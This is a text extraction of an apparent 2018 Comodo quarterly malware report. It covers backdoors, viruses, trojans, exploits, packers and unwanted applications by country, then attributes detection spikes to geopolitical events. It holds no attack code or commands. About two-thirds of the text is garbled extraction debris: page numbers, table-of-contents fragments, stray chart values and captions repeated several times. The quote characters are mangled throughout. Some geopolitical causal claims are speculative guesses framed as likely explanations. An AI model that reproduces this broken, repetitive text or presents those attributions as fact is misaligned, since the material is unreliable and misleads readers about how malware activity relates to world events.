521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage

The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2

The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018


Page 48 of 73

522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink

Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries

This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May


Page 49 of 73

523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware

In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo

The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections

And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018


Page 50 of 73

524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)

The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges


Page 51 of 73

53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers


Page 52 of 73

531 Constructor Constructors are applications that can be used to automatically create malware files

For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users

In Q2 Germany (de) was the top country of detection for Constructors

And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks


Page 53 of 73

532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack

MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length

In Q2 2018 Russia was the 1 home to malware Packers

This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes


Page 54 of 73

533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack

The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders

The primary country where Comodo detected this malicious behavior was in Germany

And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany


Page 55 of 73

534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile

The top two countries for Virtual Tools detections were Germany and the US

This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018


Page 56 of 73

535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time

Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense

Germany (de) and the US were the top two countries of detection for Joke malware

In this timeline you can see that this malware type is not numerous ndash but still something to be aware of


Page 57 of 73

54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications


Page 58 of 73

541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location

In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications

And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America


Page 59 of 73

542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more

The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo

As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018

And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US


Page 60 of 73

543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients

The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently

This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively

This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018


Page 61 of 73

6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type

Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world


Page 62 of 73

First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017

Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned

In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them


Page 63 of 73

7 Geopolitical Intelligence

71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes


Page 64 of 73

72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests


Page 65 of 73

73 South Korea

National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports


Page 66 of 73

74 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs


Page 67 of 73

75 Armenia

All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018


Page 68 of 73

76 Belarus

A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society


Page 69 of 73

77 Iraq

Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls


Page 70 of 73

78 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26


Page 71 of 73

79 Croatia

Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo


Page 72 of 73

710 Finland Russia USA

Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place


Page 73 of 73

8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples

Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims

Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data

Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures

NORTH AMERICA―

EUROPE―

ASIA―

REQUEST A DEMO Try Comodo Cybersecurity by speaking with

a security consultant to begin the process to set up a demo or proof-of-concept project

Contact us directly at +1 888-266-6361

copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC

VISIT COMODOCOM


Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772

Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin

Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190

countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more

than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing

millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day

The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential

threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine

learning-powered analytics artificial intelligence and human experts and insights to secure and protect

Comodo Cybersecurity customers business and public-sector partners and the public community

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository

About Comodo Cybersecurity

Brought to you by

1 Executive summary

11 Overview

12 New Trends

121 Trojans jumped to the top of the malware list

122 Cryptominers evolved into multifunctional malware

123 Android malware skyrocketed in variety

124 Geopolitical intelligence

2 Trojans going on the offensive to hunt for confidential data

21 The Most Widespread Trojan

22 PowerShell-based attack with Emotet

23 Flawed Ammyy RAT attack based on legitimate software


25 Ammyy Admin dissemination around the world for Q2


Going Fileless Killing Competitors Crashing Systems

31 BadShell attacks enterprises

32 WinstarNssmMiner a system killer

33 CoinMiner kills rivals

34 CoinHive changes its skin

35 Cryptocurrency clipboard hijacker intercepts transfers


41 Spying Stealing Mining

411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive

42 Android Malware Catalogued by Month

421 April 2018

422 May 2018

423 June 2018


51 Strategic Threat Computer Worms

511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits

53 Medium Threat Malware

531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes

54 Low Threat Malware Applications

541 Applications

542 Unwanted Applications

543 Unsafe Applications

6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 1 of 73

Table of Contents

Contents 1 EXECUTIVE SUMMARY 3

11 OVERVIEW 3 12 NEW TRENDS 3

121 Trojans jumped to the top of the malware list 3 122 Cryptominers evolved into multifunctional malware 3 123 Android malware skyrocketed in variety 3 124 Geopolitical intelligence 3

2 TROJANS GOING ON THE OFFENSIVE TO HUNT FOR CONFIDENTIAL DATA 4

21 THE MOST WIDESPREAD TROJAN 7 22 POWERSHELL-BASED ATTACK WITH EMOTET 8 23 FLAWED AMMYY RAT ATTACK BASED ON LEGITIMATE SOFTWARE 12 24 THE GROWTH OF FLAWED AMMYY ATTACKS FOR Q2 15 25 AMMYY ADMIN DISSEMINATION AROUND THE WORLD FOR Q2 15

3 CRYPTOMINER EVOLUTION 16

GOING FILELESS KILLING COMPETITORS CRASHING SYSTEMS 16 31 BADSHELL ATTACKS ENTERPRISES 16 32 WINSTARNSSMMINER A SYSTEM KILLER 19 33 COINMINER KILLS RIVALS 20 34 COINHIVE CHANGES ITS SKIN 22 35 CRYPTOCURRENCY CLIPBOARD HIJACKER INTERCEPTS TRANSFERS24

4 ANDROID DEVICES UNDER SIEGE 26

41 SPYING STEALING MINING 26 411 KevDroid 27 412 Zoo Park 29 413 MikeSpy 30 414 Xloader 30 415 Stalker Spy 31 416 Mystery Bot 32 417 FakeSpy 33 418 RedAlert 34 419 Hero Rat 34 4110 Sonvpay 35 4111 CoinHive 36

42 ANDROID MALWARE CATALOGUED BY MONTH 37 421 April 2018 37 422 May 2018 37 423 June 2018 38


of 73









8 CONCLUSIONS 73


Page 3 of 73

1 Executive summary

11 Overview







Page 4 of 73








Page 5 of 73








Page 6 of 73








Page 7 of 73




The phishing email


Page 8 of 73




The phishing email


Page 9 of 73




Page 10 of 73



Page 11 of 73






Page 12 of 73







Page 13 of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 2 of 73









8 CONCLUSIONS 73


of 73

1 Executive summary

11 Overview







Page 4 of 73








Page 5 of 73








Page 6 of 73








Page 7 of 73




The phishing email


Page 8 of 73




The phishing email


Page 9 of 73




Page 10 of 73



Page 11 of 73






Page 12 of 73







Page 13 of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 3 of 73

1 Executive summary

11 Overview







of 73








Page 5 of 73








Page 6 of 73








Page 7 of 73




The phishing email


Page 8 of 73




The phishing email


Page 9 of 73




Page 10 of 73



Page 11 of 73






Page 12 of 73







Page 13 of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 4 of 73








of 73








Page 6 of 73








Page 7 of 73




The phishing email


Page 8 of 73




The phishing email


Page 9 of 73




Page 10 of 73



Page 11 of 73






Page 12 of 73







Page 13 of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 5 of 73








of 73








Page 7 of 73




The phishing email


Page 8 of 73




The phishing email


Page 9 of 73




Page 10 of 73



Page 11 of 73






Page 12 of 73







Page 13 of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



